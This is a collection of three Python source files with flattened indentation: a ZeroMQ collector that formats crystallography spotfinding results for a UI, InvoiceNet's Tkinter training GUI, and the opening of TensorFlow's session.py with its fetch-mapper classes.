msg = '{} Readers connected ({})'.format(
len(self.readers),
time.strftime('%b %d %Y %I:%M:%S %p'),
)
self.advance_stdout = True
elif info["state"] == "series-end":
# change reader index in dictionary of active readers to "EOS"
self.readers[reader_name]['status'] = 'IDLE'
msg = "{} received END-OF-SERIES signal".format(reader_name)
else:
self.readers[reader_name]['status'] = 'WORKING'
if info["state"] == "error":
msg = "{} DATA ERROR: {}".format(info["proc_name"], info["dat_error"])
elif info["state"] != "process":
msg = "DEBUG: {} STATE IS ".format(info["state"])
else:
return False
if self.args.verbose:
print(msg, flush=True)
return True
def write_to_file(self, rlines):
with open(self.args.record, "a") as rf:
for rline in rlines:
rf.write(rline)
def make_result_string(self, info):
# Collect results and errors
err_list = [
info[e] for e in info if ("error" in e or "comment" in e) and info[e] != ""
]
errors = "; ".join(err_list)
results = (
"{0} {1} {2} {3:.2f} {4} "
"{5:.2f} {6} {7} {{{8}}}"
"".format(
info["n_spots"], # number_of_spots
info["n_overloads"], # number_of_spots_with_overloaded_pixels
info["score"], # composite score (used to be n_indexed...)
info["hres"], # high resolution boundary
info["n_ice_rings"], # number_of_ice-rings
info["mean_shape_ratio"], # mean spot shape ratio
info["sg"], # space group
info["uc"], # unit cell
errors, # errors
)
)
# read out config format (if no path specified, read from default config file)
if self.cfg.getstr('output_delimiter') is not None:
delimiter = '{} '.format(self.cfg.getstr('output_delimiter'))
else:
delimiter = ' '
format_keywords = self.cfg.getstr('output_format').split(',')
format_keywords = [i.strip() for i in format_keywords]
# assemble and return message to UI
try:
ui_msg = info[self.cfg.getstr('output_prefix_key')]
except KeyError:
ui_msg = ''
if ui_msg == '':
ui_msg = self.cfg.getstr('default_output_prefix')
ui_msg += ' '
for kw in format_keywords:
keyword = kw
bracket = None
brackets = ['{}', '()', '[]']
split_kw = kw.split(' ')
if len(split_kw) == 2 and split_kw[1] in brackets:
keyword = split_kw[0]
bracket = split_kw[1]
try:
if kw.startswith('[') and kw.endswith(']'):
keyword = ''
value = info[kw[1:-1]]
elif 'result' in keyword:
value = results
else:
value = info[keyword]
except KeyError as e:
raise e
else:
if keyword == '':
item = value
elif bracket:
item = '{0} {1}{2}{3}'.format(keyword, bracket[0],
value, bracket[1])
else:
item = '{0} {1}'.format(keyword, value)
if format_keywords.index(kw) == len(format_keywords) - 1:
delimiter = ''
ui_msg += item + delimiter
return ui_msg
def print_to_stdout(self, counter, info, ui_msg):
lines = [
"*** [{}] ({}) SERIES {}, FRAME {} ({}):".format(
counter, info["proc_name"], info["series"], info["frame"],
info["full_path"]
),
" {}".format(ui_msg),
" TIME: wait = {:.4f} sec, recv = {:.4f} sec, "
"proc = {:.4f} ,total = {:.2f} sec".format(
info["wait_time"],
info["receive_time"],
info["proc_time"],
info["total_time"],
),
"***\n",
]
for ln in lines:
print(ln)
if self.args.record:
self.write_to_file(lines)
def output_results(self, counter, info, verbose=False):
ui_msg = None
try:
ui_msg = self.make_result_string(info=info)
except Exception as exp:
import traceback
traceback.print_exc()
print("PRINT ERROR: ", exp)
else:
if verbose:
self.print_to_stdout(counter=counter, info=info, ui_msg=ui_msg)
finally:
return ui_msg
def initialize_zmq_sockets(self):
cport = "7{}".format(str(self.cfg.getstr('port'))[1:])
self.c_socket = self.make_socket(
socket_type="pull",
wid=self.name,
host=self.localhost,
port=cport,
bind=True,
)
if self.cfg.getboolean('send_to_ui') or (self.cfg.getstr('uihost') and
self.cfg.getstr('uiport')):
self.ui_socket = self.make_socket(
socket_type="push",
wid=self.name + "_2UI",
host=self.cfg.getstr('uihost'),
port=self.cfg.getstr('uiport'),
verbose=True
)
self.ui_socket.setsockopt(zmq.SNDTIMEO, 1000)
def collect_results(self):
self.initialize_zmq_sockets()
counter = 0
while True:
if self.c_socket.poll(timeout=500):
info = self.c_socket.recv_json()
if info:
# understand info (if not regular info, don't send to UI)
if self.understand_info(info):
continue
else:
counter += 1
# send string to UI (DHS or Interceptor GUI)
ui_msg = self.output_results(
counter, info, verbose=self.args.verbose
)
if self.cfg.getboolean('send_to_ui') or (self.cfg.getstr(
'uihost') and self.cfg.getstr('uiport')):
try:
self.ui_socket.send_string(ui_msg)
except Exception as e:
print('UI SEND ERROR: ', e)
else:
if self.advance_stdout:
self.advance_stdout = False
print('', flush=True)
def run(self):
report_thread = Thread(target=self.collect_results)
monitor_thread = Thread(target=self.monitor_splitter_messages)
report_thread.start()
monitor_thread.start()
# -- end
|
trainer.py
|
# Copyright (c) 2020 Sarthak Mittal
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import time
import glob
import random
import pdf2image
import simplejson
import numpy as np
from tqdm import tqdm
from tkinter import *
from tkinter import filedialog, messagebox
from tkinter.ttk import Progressbar
from PIL import Image, ImageTk
from .. import FIELDS, FIELD_TYPES
from ..common import util
from ..acp.acp import AttendCopyParse
from ..acp.data import InvoiceData
from .custom_widgets import HoverButton, Logger, StoppableThread
class Trainer(Frame):
def __init__(self, master=None, **kw):
Frame.__init__(self, master, **kw)
self.background = '#303030'
self.border_color = '#404040'
self.args = {
"data_dir": "",
"prepared_data": "processed_data",
"field": list(FIELDS.keys())[0],
"batch_size": 4
}
self.textboxes = {}
self.thread = None
self.running = False
self._init_ui()
def _init_ui(self):
ws = self.master.winfo_screenwidth()
hs = self.master.winfo_screenheight()
h = hs - 100
w = int(h / 1.414) + 100
x = (ws / 2) - (w / 2)
y = (hs / 2) - (h / 2)
self.master.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.master.maxsize(w, h)
self.master.minsize(w, h)
self.master.title("InvoiceNet - Trainer")
self.pack(fill=BOTH, expand=True)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=0)
self.rowconfigure(1, weight=1)
self.rowconfigure(2, weight=0)
self.rowconfigure(3, weight=1)
self.configure(bg=self.background, bd=0)
logo_frame = Frame(self, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=1)
param_frame = Frame(self, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=1)
progress_frame = Frame(self, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
main_frame = Frame(self, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=1)
logo_frame.grid(row=0, column=0, sticky='news')
param_frame.grid(row=1, column=0, sticky='news')
progress_frame.grid(row=2, column=0, sticky='news', padx=50, pady=(0, 20))
main_frame.grid(row=3, column=0, sticky='news')
# Logo Frame
logo_frame.columnconfigure(0, weight=1)
logo_frame.columnconfigure(1, weight=0)
logo_frame.columnconfigure(2, weight=0)
logo_frame.columnconfigure(3, weight=1)
logo_frame.rowconfigure(0, weight=1)
self.logo_img = ImageTk.PhotoImage(Image.open(r'widgets/logo.png'))
Label(logo_frame, bg=self.background, image=self.logo_img).grid(row=0, column=1, sticky='news', pady=10)
Label(logo_frame, text="InvoiceNet", bg=self.background,
fg="white", font=("Arial", 24, "bold")).grid(row=0, column=2, sticky='news', padx=20, pady=10)
# Param Frame
param_frame.columnconfigure(0, weight=1)
param_frame.columnconfigure(1, weight=0)
param_frame.columnconfigure(2, weight=0)
param_frame.columnconfigure(3, weight=1)
param_frame.rowconfigure(0, weight=1)
param_frame.rowconfigure(1, weight=0)
param_frame.rowconfigure(2, weight=0)
param_frame.rowconfigure(3, weight=0)
param_frame.rowconfigure(4, weight=1)
data_param = Frame(param_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
out_param = Frame(param_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
field_param = Frame(param_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
batch_param = Frame(param_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
data_param.grid(row=1, column=1, pady=(0, 20), padx=20)
out_param.grid(row=2, column=1, pady=20, padx=20)
field_param.grid(row=1, column=2, pady=(0, 20), padx=20)
batch_param.grid(row=2, column=2, pady=20, padx=20)
df = Frame(data_param, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
df.pack(side=TOP, fill=BOTH)
Label(df, text="Data Folder:", bg=self.background,
fg="white", font=("Arial", 8, "bold"), anchor='w').pack(side=LEFT, fill=BOTH)
HoverButton(df, image_path=r'widgets/open_dir_small.png', command=lambda: self._open_dir("data_dir"),
width=18, height=18, bg=self.background, bd=0,
highlightthickness=0, activebackground='#558de8').pack(side=RIGHT)
self.textboxes["data_dir"] = Text(data_param, height=1, width=20)
self.textboxes["data_dir"].insert('1.0', self.args["data_dir"])
self.textboxes["data_dir"].pack(side=BOTTOM)
of = Frame(out_param, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
of.pack(side=TOP, fill=BOTH)
Label(of, text="Processed Data Folder:", bg=self.background,
anchor='w', fg="white", font=("Arial", 8, "bold")).pack(side=LEFT, fill=BOTH)
HoverButton(of, image_path=r'widgets/open_dir_small.png', command=lambda: self._open_dir("prepared_data"),
width=18, height=18, bg=self.background, bd=0,
highlightthickness=0, activebackground='#558de8').pack(side=RIGHT)
self.textboxes["prepared_data"] = Text(out_param, height=1, width=20)
self.textboxes["prepared_data"].insert('1.0', self.args["prepared_data"])
self.textboxes["prepared_data"].pack(side=BOTTOM)
Label(field_param, text="Field:", bg=self.background,
anchor='w', fg="white", font=("Arial", 8, "bold")).pack(side=TOP, fill=BOTH)
self.field_text = StringVar(field_param)
self.field_text.set(list(FIELDS.keys())[0])
keys = list(FIELDS.keys())
field_list = OptionMenu(field_param, self.field_text, *keys)
field_list.configure(highlightthickness=0, width=20, bg='#ffffff')
field_list.pack(side=BOTTOM)
for key in keys:
field_list['menu'].entryconfigure(key, state="normal")
Label(batch_param, text="Batch Size:", bg=self.background,
anchor='w', fg="white", font=("Arial", 8, "bold")).pack(side=TOP, fill=BOTH)
self.batch_text = StringVar(batch_param)
self.batch_text.set("4")
batch_list = OptionMenu(batch_param, self.batch_text, *[str(2 ** i) for i in range(8)])
batch_list.configure(highlightthickness=0, width=20, bg='#ffffff')
batch_list.pack(side=BOTTOM)
HoverButton(param_frame, image_path=r'widgets/prepare.png', command=self._prepare_data,
text='Prepare Data', compound='center', font=("Arial", 10, "bold"), bg=self.background,
bd=0, highlightthickness=0, activebackground=self.background).grid(row=3, column=1, columnspan=2,
padx=20, pady=(20, 0),
sticky='news')
# Progress Frame
self.progress_label = Label(progress_frame, text="Preparing data:", bg=self.background,
anchor='w', fg="white", font=("Arial", 8, "bold"), bd=0, highlightthickness=0)
self.progress_label.pack(side=TOP, expand=True, fill=X, pady=(10, 5))
self.progressbar = Progressbar(progress_frame, orient=HORIZONTAL, length=100, mode='determinate')
self.progressbar.pack(side=BOTTOM, expand=True, fill=X)
# Main Frame
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
button_frame = Frame(main_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
button_frame.grid(row=0, column=0, sticky='news')
button_frame.rowconfigure(0, weight=1)
button_frame.columnconfigure(0, weight=1)
button_frame.columnconfigure(1, weight=0)
button_frame.columnconfigure(2, weight=1)
self.start_button = HoverButton(button_frame, image_path=r'widgets/begin.png', command=self._start,
text='Start', compound='center', font=("Arial", 10, "bold"), bg=self.background,
bd=0, highlightthickness=0, activebackground=self.background)
self.stop_button = HoverButton(button_frame, image_path=r'widgets/stop.png', command=self._stop,
text='Stop', compound='center', font=("Arial", 10, "bold"), bg=self.background,
bd=0, highlightthickness=0, activebackground=self.background)
self.start_button.grid(row=0, column=1)
self.stop_button.grid(row=0, column=1)
self.stop_button.grid_forget()
self.logger = Logger(main_frame, height=18, bg=self.background, bd=0, relief=SUNKEN)
self.logger.grid(row=1, column=0, sticky='news')
def _train(self):
train_data = InvoiceData.create_dataset(
field=self.args["field"],
data_dir=os.path.join(self.args["prepared_data"], 'train/'),
batch_size=self.args["batch_size"]
)
val_data = InvoiceData.create_dataset(
field=self.args["field"],
data_dir=os.path.join(self.args["prepared_data"], 'val/'),
batch_size=self.args["batch_size"]
)
restore = None
if os.path.exists(os.path.join('./models/invoicenet/', self.args["field"])):
restore = messagebox.askyesno(
title="Restore",
message="A checkpoint was found! Do you want to restore checkpoint for training?")
restore = True if restore else False
model = AttendCopyParse(field=self.args["field"], restore=restore)
print_interval = 20
early_stop_steps = 0
best = float("inf")
train_iter = iter(train_data)
val_iter = iter(val_data)
self.logger.log("Initializing training!")
start = time.time()
step = 0
while True:
train_loss = model.train_step(next(train_iter))
if not np.isfinite(train_loss):
raise ValueError("NaN loss")
if step % print_interval == 0:
took = time.time() - start
val_loss = model.val_step(next(val_iter))
self.logger.log("[step: %d | %.2f steps/s]: train loss: %.4f val loss: %.4f" % (
step, (step + 1) / took, train_loss, val_loss))
if not np.isfinite(val_loss):
self.logger.log("ERROR: NaN loss")
self.thread.stop()
if val_loss < best:
early_stop_steps = 0
best = val_loss
model.save("best")
else:
early_stop_steps += print_interval
if early_stop_steps >= 500:
self.logger.log("Validation loss has not improved for 500 steps")
self.thread.stop()
step += 1
if self.thread.stopped():
self.logger.log("Training terminated!")
break
self.running = False
self.stop_button.grid_forget()
self.start_button.grid(row=0, column=1)
def _get_inputs(self):
self.args["field"] = self.field_text.get()
self.args["batch_size"] = int(self.batch_text.get())
self.args["data_dir"] = self.textboxes["data_dir"].get("1.0", 'end-1c')
self.args["prepared_data"] = self.textboxes["prepared_data"].get("1.0", 'end-1c')
if not self.args["prepared_data"].endswith('/'):
self.args["prepared_data"] += '/'
if self.args["data_dir"] == '':
return
if not self.args["data_dir"].endswith('/'):
self.args["data_dir"] += '/'
def _start(self):
self._get_inputs()
if not os.path.exists(self.args["prepared_data"]):
messagebox.showerror("Error", "Prepared data folder does not exist!")
return
files = glob.glob(self.args["prepared_data"] + "**/*.json", recursive=True)
if not files:
messagebox.showerror("Error",
"Could not find processed data in \"{}\". Did you prepare training data?".format(
self.args["prepared_data"]))
return
if not self.running:
self.running = True
self.thread = StoppableThread(target=self._train)
self.thread.daemon = True
self.thread.start()
self.start_button.grid_forget()
self.stop_button.grid(row=0, column=1)
def _stop(self):
if self.running:
self.thread.stop()
self.running = False
self.logger.log("Stopping training...")
def _open_dir(self, key):
dir_name = filedialog.askdirectory(initialdir='.', title="Select Directory Containing Invoices")
if not dir_name:
return
self.args[key] = dir_name
self.textboxes[key].delete('1.0', END)
self.textboxes[key].insert('1.0', self.args[key])
def _prepare_data(self):
self._get_inputs()
if self.args["data_dir"] == '':
messagebox.showerror("Error", "Data folder does not exist!")
return
if not os.path.exists(self.args["data_dir"]):
messagebox.showerror("Error", "Data folder does not exist!")
return
self.progressbar["value"] = 0
self.progress_label.configure(text="Preparing Data:")
os.makedirs(os.path.join(self.args["prepared_data"], 'train'), exist_ok=True)
os.makedirs(os.path.join(self.args["prepared_data"], 'val'), exist_ok=True)
filenames = [os.path.abspath(f) for f in glob.glob(self.args["data_dir"] + "**/*.pdf", recursive=True)]
random.shuffle(filenames)
idx = int(len(filenames) * 0.2)
train_files = filenames[idx:]
val_files = filenames[:idx]
self.logger.log("Total: {}".format(len(filenames)))
self.logger.log("Training: {}".format(len(train_files)))
self.logger.log("Validation: {}".format(len(val_files)))
total_samples = len(filenames)
sample_idx = 0
for phase, filenames in [('train', train_files), ('val', val_files)]:
self.logger.log("Preparing {} data...".format(phase))
for filename in tqdm(filenames):
# try:
page = pdf2image.convert_from_path(filename)[0]
page.save(os.path.join(self.args["prepared_data"], phase, os.path.basename(filename)[:-3] + 'png'))
height = page.size[1]
width = page.size[0]
ngrams = util.create_ngrams(page)
for ngram in ngrams:
if "amount" in ngram["parses"]:
ngram["parses"]["amount"] = util.normalize(ngram["parses"]["amount"], key="amount")
if "date" in ngram["parses"]:
ngram["parses"]["date"] = util.normalize(ngram["parses"]["date"], key="date")
with open(filename[:-3] + 'json', 'r') as fp:
labels = simplejson.loads(fp.read())
fields = {}
for field in FIELDS:
if field in labels:
if FIELDS[field] == FIELD_TYPES["amount"]:
fields[field] = util.normalize(labels[field], key="amount")
elif FIELDS[field] == FIELD_TYPES["date"]:
fields[field] = util.normalize(labels[field], key="date")
else:
fields[field] = labels[field]
else:
fields[field] = ''
data = {
"fields": fields,
"nGrams": ngrams,
"height": height,
"width": width,
"filename": os.path.abspath(
os.path.join(self.args["prepared_data"], phase, os.path.basename(filename)[:-3] + 'png'))
}
with open(os.path.join(self.args["prepared_data"], phase, os.path.basename(filename)[:-3] + 'json'),
'w') as fp:
fp.write(simplejson.dumps(data, indent=2))
# except Exception as exp:
# self.logger.log("Skipping {} : {}".format(filename, exp))
sample_idx += 1
self.progress_label.configure(text="Preparing data [{}/{}]:".format(sample_idx, total_samples))
self.progressbar["value"] = (sample_idx / total_samples) * 100
self.progressbar.update()
self.progress_label.configure(text="Completed!")
self.progressbar["value"] = 100
self.progressbar.update()
self.logger.log("Prepared data stored in '{}'".format(self.args["prepared_data"]))
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import re
import threading
import warnings
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import object_identity
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
_python_session_create_counter = monitoring.Counter(
'/tensorflow/api/python/session_create_counter',
'Counter for number of sessions created in Python.')
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
raise ValueError('%s has already been registered so ignore it.' %
tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = object_identity.ObjectIdentityDictionary()
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(f)
if j is None:
j = len(seen_fetches)
seen_fetches[f] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = self._fetch_type()
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
results[k] = m.build_results([values[j] for j in vi])
return results
